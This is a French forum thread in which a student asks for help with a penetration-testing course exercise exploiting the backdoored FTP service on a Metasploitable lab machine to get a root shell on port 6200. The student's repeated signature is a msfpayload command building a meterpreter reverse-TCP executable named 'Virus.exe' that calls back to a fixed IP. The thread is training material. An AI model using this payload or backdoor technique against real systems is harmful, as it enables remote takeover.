Partage
  • Partager sur Facebook
  • Partager sur Twitter

Cours: Conduisez un test de pénétration / Activité

    4 août 2019 à 22:15:59

    Bonjour, je suis le cours énoncé ci- dessus et au niveau de l'activité 1, la 4ème étape consiste en :

    Étape 4 : Sélectionnez une vulnérabilité

    • Quel est le logiciel et la version de l’application FTP qui tourne surmetasploitableFaites une capture d'écran pour montrer ce que vous avez trouvé, numérotez-le « Screenshot4 ». 

    • Cette version particulière contient une porte dérobée qui a été glissée dans le code. Si une connexion FTP est initiée avec le nom d'utilisateur « backdoored :)», la porte dérobée ouvrira unshelld'écoute sur le port 6200. Essayez de vous connecter au serveur FTP (port 21) avec le nom d’utilisateur « testeur :) ». Vérifiez que le port 6200 est bien ouvert avecNmap.Faites une capture d'écran pour montrer ce que vous avez trouvé, numérotez-le « Screenshot5 ». 

    • Maintenant, essayez de vous connecter sur le port 6200 avec un shell et montrez que vous avez la main en root. Faites une capture d'écran pour le montrer, numérotez-le « Screenshot6 ». La commande est « telnet [IP metasploitable] ».

    Je ne comprend pas le 2nd point, quelles sont les commandes à effectuer, j'arrive à passer au 3ème point sans avoir fait le 2nd. 

    Quelqu'un peut m'aider ???

    Merci

    LeDevEnC

    • Partager sur Facebook
    • Partager sur Twitter

    msfpayload -p windows/meterpreter/reverse_tcp lhost=172.45.3.23 lport=80 R > Desktop/Virus.exe

      5 août 2019 à 12:51:16

      LeDevEnC a écrit:

      Si une connexion FTP est initiée avec le nom d'utilisateur « backdoored :)», la porte dérobée ouvrira unshelld'écoute sur le port 6200. Essayez de vous connecter au serveur FTP (port 21) avec le nom d’utilisateur « testeur :) ».

      Bon, c'est un peu confu, vu qu'il parle de deux noms d’utilisateurs différents pour avoir le shell en écoute sur le port 6200, mais ça doit être un des deux, ou peut-être les deux, suffit d'essayer.

      LeDevEnC a écrit:

      La commande est « telnet [IP metasploitable] ».

      RTFM?! :)

      • Partager sur Facebook
      • Partager sur Twitter
        5 août 2019 à 14:02:46

        Je vais essayer, que veut dire RTFM ?? :D L'autre problème est que quand j'effectue la commande:

        ftp 192.168.1.24 21

        le terminal me demande le nom d'utilisateur et un MDP, que je ne connais pas

        si je fais ftp 192.168.1.24 6000 car c'est le port le plus proche de 6200, il y a écrit connected to 192.168.1.24 et plus rien un clignotant blanc rectangle(normal koi).

        dois-je utiliser metasploit pour me connecter en bind_tcp durant ce temps ou le port 6000 est en écoute ??

        si oui quelles sont les commandes, et comme hier j'arrive à me connecter en telnet à la machine en root.

        -
        Edité par LeDevEnC 5 août 2019 à 14:16:27

        • Partager sur Facebook
        • Partager sur Twitter

        msfpayload -p windows/meterpreter/reverse_tcp lhost=172.45.3.23 lport=80 R > Desktop/Virus.exe

        Cours: Conduisez un test de pénétration / Activité

        × Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
        × Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
        • Editeur
        • Markdown